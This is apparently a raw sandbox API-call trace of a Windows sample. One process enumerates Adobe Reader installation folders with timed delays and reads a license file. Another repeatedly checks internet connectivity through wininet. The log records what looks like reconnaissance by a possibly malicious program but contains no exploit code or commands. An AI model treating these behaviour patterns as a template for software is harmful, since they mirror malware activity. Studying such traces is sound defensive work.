FileName => FileHandle => 0x0000018c FileInformation => x\x00\x00\x00\x00\x00\x00\x00\x00\xec\xab\xaf0\x9a\xcd\x01\xa0\xea\x8f\xc4\xe6\x91\xcf\x01\x00\xec\xab\xaf0\x9a\xcd\x01\xa0\xea\x8f\xc4\xe6\x91\xcf\x01N \x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00C\x00R\x00Y\x00P\x00T\x00O\x00~\x001\x00.\x00S\x00I\x00G\x00c\x00r\x00y\x00p\x00t\x00o\x00c\x00m\x00e\x00.\x00s\x00i\x00g\x00p\x00\x00\x00\x00\x00\x00\x00\x00s?\xb30\x9a\xcd\x01\xd0\xf3\x9c\xc3\xe6\x91\xcf\x01\x00s?\xb30\x9a\xcd\x01\xd0\xf3\x9c\xc3\xe6\x91\xcf\x01\x80N\x01\x00\x00\x00\x00\x00\x00P\x01\x00\x00\x00\x00\x00 \x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00E\x00u\x00l\x00a\x00.\x00e\x00x\x00e\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x19\xdd\xb00\x9a\xcd\x01\xe0@\xa2\xc4\xe6\x91\xcf\x01 |
SUCCESS | 0x00000000 | |
| 07:44:58,779 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:58,859 | 504 | FindFirstFileExW |
FileName => C:\Program Files\Adobe\Reader 11.0\Reader\IDTemplates\*.* |
SUCCESS | 0x0016c170 | |
| 07:44:58,859 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001ac FileInformation => h\x00\x00\x00\x00\x00\x00\x00 M^\xc3\xe6\x91\xcf\x01 M^\xc3\xe6\x91\xcf\x01 M^\xc3\xe6\x91\xcf\x01 M^\xc3\xe6\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00c\x00r\x00o\x00\x00\x00\x00\x00\x00\x00\x00\x00 M^\xc3\xe6\x91\xcf\x01\x10\xf1e\xc3\xe6\x91\xcf\x01\x10\xf1e\xc3\xe6\x91\xcf\x01\x10\xf1e\xc3\xe6\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00E\x00N\x00U\x00 |
SUCCESS | 0x00000000 | |
| 07:44:58,859 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:59,039 | 504 | FindFirstFileExW |
FileName => C:\Program Files\Adobe\Reader 11.0\Reader\IDTemplates\ENU\*.* |
SUCCESS | 0x0016c1a8 | |
| 07:44:59,039 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000198 FileInformation => h\x00\x00\x00\x00\x00\x00\x00 M^\xc3\xe6\x91\xcf\x01\x10\xf1e\xc3\xe6\x91\xcf\x01@xg\xc3\xe6\x91\xcf\x01@xg\xc3\xe6\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00i\x00m\x00e\x00x\x00\x00\x00\x00\x00\x00\x00\x00\x19\xdd\xb00\x9a\xcd\x01p\xffh\xc3\xe6\x91\xcf\x01\x00\x19\xdd\xb00\x9a\xcd\x01p\xffh\xc3\xe6\x91\xcf\x01\x96@\x01\x00\x00\x00\x00\x00\x00P\x01\x00\x00\x00\x00\x00 \x00\x00\x00\x16\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00A\x00d\x00o\x00b\x00e\x00I\x00D\x00.\x00p\x00d\x00f\x00\x00\x00r\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xec\xab\xaf0\x9a\xcd\x01@xg\xc3\xe6\x91\xcf\x01\x00\xec\xab\xaf0\x9a\xcd\x01 |
SUCCESS | 0x00000000 | |
| 07:44:59,039 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000198 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:59,039 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001ac FileInformation => |
FAILURE | 2147483654 | |
| 07:44:59,039 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:59,119 | 504 | FindFirstFileExW |
FileName => C:\Program Files\Adobe\Reader 11.0\Reader\Javascripts\*.* |
SUCCESS | 0x0016c170 | |
| 07:44:59,119 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001ac FileInformation => h\x00\x00\x00\x00\x00\x00\x00\x10"\xc9\xd6\xe6\x91\xcf\x01\x10"\xc9\xd6\xe6\x91\xcf\x01\x10"\xc9\xd6\xe6\x91\xcf\x01\x10"\xc9\xd6\xe6\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00c\x00r\x00o\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xa0\x9b<\xc4j\xcf\x01p0\xcc\xd6\xe6\x91\xcf\x01\x00\xa0\x9b<\xc4j\xcf\x01p0\xcc\xd6\xe6\x91\xcf\x01\xb0\xd9\x11\x00\x00\x00\x00\x00\x00\xe0\x11\x00\x00\x00\x00\x00 \x00\x00\x00"\x00\x00\x00\x00\x00\x00\x00\x18\x00J\x00S\x00B\x00Y\x00T\x00E\x00~\x001\x00.\x00B\x00I\x00N\x00J\x00S\x00B\x00y\x00t\x00e\x00C\x00o\x00d\x00e\x00W\x00i\x00n\x00.\x00b\x00i\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:59,119 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001ac FileInformation => |
FAILURE | 2147483654 | |
| 07:44:59,119 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:59,200 | 504 | FindFirstFileExW |
FileName => C:\Program Files\Adobe\Reader 11.0\Reader\Legal\*.* |
SUCCESS | 0x0016c170 | |
| 07:44:59,200 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001ac FileInformation => h\x00\x00\x00\x00\x00\x00\x00\x00\x08\x86\xc3\xe6\x91\xcf\x01\x00\x08\x86\xc3\xe6\x91\xcf\x010\x8f\x87\xc3\xe6\x91\xcf\x010\x8f\x87\xc3\xe6\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00c\x00r\x00o\x00\x00\x00\x00\x00\x00\x00\x00\x000\x8f\x87\xc3\xe6\x91\xcf\x01\xb0\xb2N\xda\xe6\x91\xcf\x01\xb0\xb2N\xda\xe6\x91\xcf\x01\xb0\xb2N\xda\xe6\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00E\x00N\x00U\x00 |
SUCCESS | 0x00000000 | |
| 07:44:59,200 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:59,280 | 504 | FindFirstFileExW |
FileName => C:\Program Files\Adobe\Reader 11.0\Reader\Legal\ENU\*.* |
SUCCESS | 0x0016c1a8 | |
| 07:44:59,280 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000198 FileInformation => h\x00\x00\x00\x00\x00\x00\x000\x8f\x87\xc3\xe6\x91\xcf\x01\xb0\xb2N\xda\xe6\x91\xcf\x01\xb0\xb2N\xda\xe6\x91\xcf\x01\xb0\xb2N\xda\xe6\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00i\x00m\x00e\x00p\x00\x00\x00\x00\x00\x00\x00\x00\xcd\xcc=\xc4j\xcf\x01\xb0\xb2N\xda\xe6\x91\xcf\x01\x00\xcd\xcc=\xc4j\xcf\x01\xb0\xb2N\xda\xe6\x91\xcf\x01&\x04\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00e\x00u\x00l\x00a\x00.\x00i\x00n\x00i\x00p\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00F\x0e\xb20\x9a\xcd\x010\x8f\x87\xc3\xe6\x91\xcf\x01\x00F\x0e\xb20\x9a\xcd\x010\x8f\x87\xc3\xe6\x91\xcf\x01 |
SUCCESS | 0x00000000 | |
| 07:44:59,280 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Program Files\Adobe\Reader 11.0\Reader\Legal\ENU\license.html DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x0000019c |
SUCCESS | 0x00000000 | |
| 07:44:59,290 | 504 | NtReadFile |
Buffer => \xef\xbb\xbf<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Adobe PlatformClient FileHandle => 0x0000019c |
SUCCESS | 0x00000000 | |
| 07:44:59,460 | 504 | NtReadFile |
Buffer =>
(b) improper verification of a certificate, (c) use of a
certificate other than as permitted by any applicable terms and
conditions, this agreement, or applicable law; (d) failure to
exercise reasonable judgment under the circumstanc FileHandle => 0x0000019c |
SUCCESS | 0x00000000 | |
| 07:44:59,480 | 504 | NtReadFile |
Buffer => FileHandle => 0x0000019c |
FAILURE | 3221225489 | |
| 07:44:59,480 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000198 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:59,480 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001ac FileInformation => |
FAILURE | 2147483654 | |
| 07:44:59,480 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:59,490 | 1308 | LdrGetDllHandle |
ModuleHandle => 0x771b0000 FileName => wininet.dll |
SUCCESS | 0x00000000 | |
| 07:44:59,490 | 1308 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => InternetGetConnectedState FunctionAddress => 0x771d5c4e ModuleHandle => 0x771b0000 |
SUCCESS | 0x00000000 | |
| 07:44:59,490 | 1308 | RegQueryValueExA |
Handle => 0x000000b8 DataLength => 4 ValueName => EnableAutodial Type => 184 |
FAILURE | 0x00000002 | |
| 07:44:59,490 | 1308 | NtQueryInformationFile |
FileHandle => 0x000000c0 FileInformation => \x00\xc0\x03\x00\x00\x00\x00\x00\x00\xc0\x03\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | 1 time |
| 07:44:59,490 | 1308 | NtDelayExecution |
Milliseconds => 800 |
SUCCESS | 0x00000000 | |
| 07:44:59,570 | 504 | FindFirstFileExW |
FileName => C:\Program Files\Adobe\Reader 11.0\Reader\plug_ins\*.* |
SUCCESS | 0x0016c170 | |
| 07:44:59,570 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001ac FileInformation => h\x00\x00\x00\x00\x00\x00\x00\xb0\x10\xa5\xb9\xe6\x91\xcf\x01\xf0E \xe8\xe6\x91\xcf\x01`\x11|\xe4\xe6\x91\xcf\x01`\x11|\xe4\xe6\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00c\x00r\x00o\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\xec\xd67\xc4j\xcf\x01@\x80\x08\xd8\xe6\x91\xcf\x01\x00\xec\xd67\xc4j\xcf\x01@\x80\x08\xd8\xe6\x91\xcf\x01cD\x07\x00\x00\x00\x00\x00\x00P\x07\x00\x00\x00\x00\x00 \x00\x00\x00"\x00\x00\x00\x00\x00\x00\x00\x18\x00A\x00C\x00C\x00E\x00S\x00S\x00~\x001\x00.\x00A\x00P\x00I\x00A\x00c\x00c\x00e\x00s\x00s\x00i\x00b\x00i\x00l\x00i\x00t\x00y\x00.\x00a\x00p\x00i\x00p\x00\x00\x00\x00\x00\x00\x00\xb0\xd7\xf9\xda\xe6\x91\xcf\x01\xb0\xd7\xf9\xda\xe6\x91\xcf\x01 |
SUCCESS | 0x00000000 | |
| 07:44:59,570 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:59,660 | 504 | FindFirstFileExW |
FileName => C:\Program Files\Adobe\Reader 11.0\Reader\plug_ins\AcroForm\*.* |
SUCCESS | 0x0016c1a8 | |
| 07:44:59,660 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000198 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\xb0\xd7\xf9\xda\xe6\x91\xcf\x01\xb0\xd7\xf9\xda\xe6\x91\xcf\x01\xb0\xed\xb1\xdc\xe6\x91\xcf\x01\xb0\xed\xb1\xdc\xe6\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00i\x00m\x00e\x00x\x00\x00\x00\x00\x00\x00\x00\x00\xa0\x9b<\xc4j\xcf\x01\xb0\xd7\xf9\xda\xe6\x91\xcf\x01\x00\xa0\x9b<\xc4j\xcf\x01\xb0\xd7\xf9\xda\xe6\x91\xcf\x01\x16\xb4\x00\x00\x00\x00\x00\x00\x00\xc0\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x18\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00a\x00d\x00o\x00b\x00e\x00p\x00d\x00f\x00.\x00x\x00d\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xb0\xed\xb1\xdc\xe6\x91\xcf\x01pA\x04\xe1\xe6\x91\xcf\x01pA\x04\xe1\xe6\x91\xcf\x01 |
SUCCESS | 0x00000000 | |
| 07:44:59,660 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:59,740 | 504 | FindFirstFileExW |
FileName => C:\Program Files\Adobe\Reader 11.0\Reader\plug_ins\AcroForm\PMP\*.* |
SUCCESS | 0x00169d50 | |
| 07:44:59,740 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x0000019c FileInformation => h\x00\x00\x00\x00\x00\x00\x00\xb0\xed\xb1\xdc\xe6\x91\xcf\x01pA\x04\xe1\xe6\x91\xcf\x01pA\x04\xe1\xe6\x91\xcf\x01pA\x04\xe1\xe6\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00 any a\x80\x00\x00\x00\x00\x00\x00\x00\x00\xec\xd67\xc4j\xcf\x01pA\x04\xe1\xe6\x91\xcf\x01\x00\xec\xd67\xc4j\xcf\x01pA\x04\xe1\xe6\x91\xcf\x01\x00\\x01\x00\x00\x00\x00\x00\x00`\x01\x00\x00\x00\x00\x00 \x00\x00\x00\x1e\x00\x00\x00\x00\x00\x00\x00\x18\x00A\x00D\x00O\x00B\x00E\x00P\x00~\x001\x00.\x00P\x00M\x00P\x00A\x00d\x00o\x00b\x00e\x00P\x00D\x00F\x004\x001\x007\x00.\x00p\x00m\x00p\x00rcum\x80\x00\x00\x00\x00\x00\x00\x00\x00\xa0\x9b<\xc4j\xcf\x01PR\xc7\xdc\xe6\x91\xcf\x01 |
SUCCESS | 0x00000000 | |
| 07:44:59,740 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x0000019c FileInformation => |
FAILURE | 2147483654 | |
| 07:44:59,740 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000198 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:59,740 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:59,820 | 504 | FindFirstFileExW |
FileName => C:\Program Files\Adobe\Reader 11.0\Reader\plug_ins\Annotations\*.* |
SUCCESS | 0x0016c1a8 | |
| 07:44:59,820 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000198 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\x80\x90h\xbc\xe6\x91\xcf\x01\x80\x90h\xbc\xe6\x91\xcf\x01\x80\x90h\xbc\xe6\x91\xcf\x01\x80\x90h\xbc\xe6\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00i\x00m\x00e\x00\x00\x00\x00\x00\x00\x00\x00\x00\x80\x90h\xbc\xe6\x91\xcf\x01\x80\x90h\xbc\xe6\x91\xcf\x01\x80\x90h\xbc\xe6\x91\xcf\x01\x80\x90h\xbc\xe6\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00S\x00t\x00a\x00m\x00p\x00s\x00 |
SUCCESS | 0x00000000 | |
| 07:44:59,820 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:59,901 | 504 | FindFirstFileExW |
FileName => C:\Program Files\Adobe\Reader 11.0\Reader\plug_ins\Annotations\Stamps\*.* |
SUCCESS | 0x00169d50 | |
| 07:44:59,901 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x0000019c FileInformation => h\x00\x00\x00\x00\x00\x00\x00\x80\x90h\xbc\xe6\x91\xcf\x01\x80\x90h\xbc\xe6\x91\xcf\x01\xc0%\xf5\xbc\xe6\x91\xcf\x01\xc0%\xf5\xbc\xe6\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00 any ah\x00\x00\x00\x00\x00\x00\x00\xc0%\xf5\xbc\xe6\x91\xcf\x01`p;\xbd\xe6\x91\xcf\x01`p;\xbd\xe6\x91\xcf\x01`p;\xbd\xe6\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00E\x00N\x00U\x00b\x00e\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xec\xab\xaf0\x9a\xcd\x01\x10&m\xbc\xe6\x91\xcf\x01\x00\xec\xab\xaf0\x9a\xcd\x01\x10&m\xbc\xe6\x91\xcf\x01r\xb7\x01\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | |
| 07:44:59,901 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:59,981 | 504 | FindFirstFileExW |
FileName => C:\Program Files\Adobe\Reader 11.0\Reader\plug_ins\Annotations\Stamps\ENU\*.* |
SUCCESS | 0x00169d88 | |
| 07:44:59,981 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000194 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\xc0%\xf5\xbc\xe6\x91\xcf\x01`p;\xbd\xe6\x91\xcf\x01 \x8dA\xbd\xe6\x91\xcf\x01 \x8dA\xbd\xe6\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00tion Cx\x00\x00\x00\x00\x00\x00\x00\x00\x19\xdd\xb00\x9a\xcd\x01@\xb8J\xbd\xe6\x91\xcf\x01\x00\x19\xdd\xb00\x9a\xcd\x01@\xb8J\xbd\xe6\x91\xcf\x01\x82\xdf\x00\x00\x00\x00\x00\x00\x00\xe0\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x16\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00D\x00y\x00n\x00a\x00m\x00i\x00c\x00.\x00p\x00d\x00f\x00is sx\x00\x00\x00\x00\x00\x00\x00\x00\x19\xdd\xb00\x9a\xcd\x01`p;\xbd\xe6\x91\xcf\x01\x00\x19\xdd\xb00\x9a\xcd\x01 |
SUCCESS | 0x00000000 | |
| 07:44:59,981 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000194 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:59,981 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x0000019c FileInformation => |
FAILURE | 2147483654 | |
| 07:44:59,981 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000198 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:59,981 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:45:00,231 | 504 | FindFirstFileExW |
FileName => C:\Program Files\Adobe\Reader 11.0\Reader\plug_ins\Multimedia\*.* |
SUCCESS | 0x0016c1a8 | |
| 07:45:00,231 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000198 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\xb0\x10\xa5\xb9\xe6\x91\xcf\x01\xb0\x10\xa5\xb9\xe6\x91\xcf\x01\xb0\x10\xa5\xb9\xe6\x91\xcf\x01\xb0\x10\xa5\xb9\xe6\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00i\x00m\x00e\x00\x00\x00\x00\x00\x00\x00\x00\x00\xb0\x10\xa5\xb9\xe6\x91\xcf\x01\xa0\xb4\xac\xb9\xe6\x91\xcf\x01\xa0\xb4\xac\xb9\xe6\x91\xcf\x01\xa0\xb4\xac\xb9\xe6\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00M\x00P\x00P\x00 |
SUCCESS | 0x00000000 | |
| 07:45:00,241 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:45:00,291 | 1308 | LdrGetDllHandle |
ModuleHandle => 0x771b0000 FileName => wininet.dll |
SUCCESS | 0x00000000 | |
| 07:45:00,291 | 1308 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => InternetGetConnectedState FunctionAddress => 0x771d5c4e ModuleHandle => 0x771b0000 |
SUCCESS | 0x00000000 | |
| 07:45:00,291 | 1308 | RegQueryValueExA |
Handle => 0x000000b8 DataLength => 4 ValueName => EnableAutodial Type => 184 |
FAILURE | 0x00000002 | |
| 07:45:00,291 | 1308 | NtQueryInformationFile |
FileHandle => 0x000000c0 FileInformation => \x00\xc0\x03\x00\x00\x00\x00\x00\x00\xc0\x03\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | 1 time |
| 07:45:00,291 | 1308 | NtDelayExecution |
Milliseconds => 800 |
SUCCESS | 0x00000000 | |
| 07:45:00,321 | 504 | FindFirstFileExW |
FileName => C:\Program Files\Adobe\Reader 11.0\Reader\plug_ins\Multimedia\MPP\*.* |
SUCCESS | 0x00169d50 | |
| 07:45:00,321 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x0000019c FileInformation => h\x00\x00\x00\x00\x00\x00\x00\xb0\x10\xa5\xb9\xe6\x91\xcf\x01\xa0\xb4\xac\xb9\xe6\x91\xcf\x01\xd0;\xae\xb9\xe6\x91\xcf\x01\xd0;\xae\xb9\xe6\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00 any ap\x00\x00\x00\x00\x00\x00\x00\x00\x19\xdd\xb00\x9a\xcd\x01\x00\xc3\xaf\xb9\xe6\x91\xcf\x01\x00\x19\xdd\xb00\x9a\xcd\x01\x00\xc3\xaf\xb9\xe6\x91\xcf\x01\x00\xe0\x01\x00\x00\x00\x00\x00\x00\xe0\x01\x00\x00\x00\x00\x00 \x00\x00\x00\x12\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00F\x00l\x00a\x00s\x00h\x00.\x00m\x00p\x00p\x00x\x00\x00\x00\x00\x00\x00\x00\x00\xec\xab\xaf0\x9a\xcd\x01\xd0;\xae\xb9\xe6\x91\xcf\x01\x00\xec\xab\xaf0\x9a\xcd\x01\xd0;\xae\xb9\xe6\x91\xcf\x01 |
SUCCESS | 0x00000000 | |
| 07:45:00,321 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x0000019c FileInformation => |
FAILURE | 2147483654 | |
| 07:45:00,321 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000198 FileInformation => |
FAILURE | 2147483654 | |
| 07:45:00,321 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001ac FileInformation => |
FAILURE | 2147483654 | |
| 07:45:00,321 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:45:00,411 | 504 | FindFirstFileExW |
FileName => C:\Program Files\Adobe\Reader 11.0\Reader\plug_ins3d\*.* |
SUCCESS | 0x0016c170 | |
| 07:45:00,411 | 504 | NtQueryDirectoryFile |
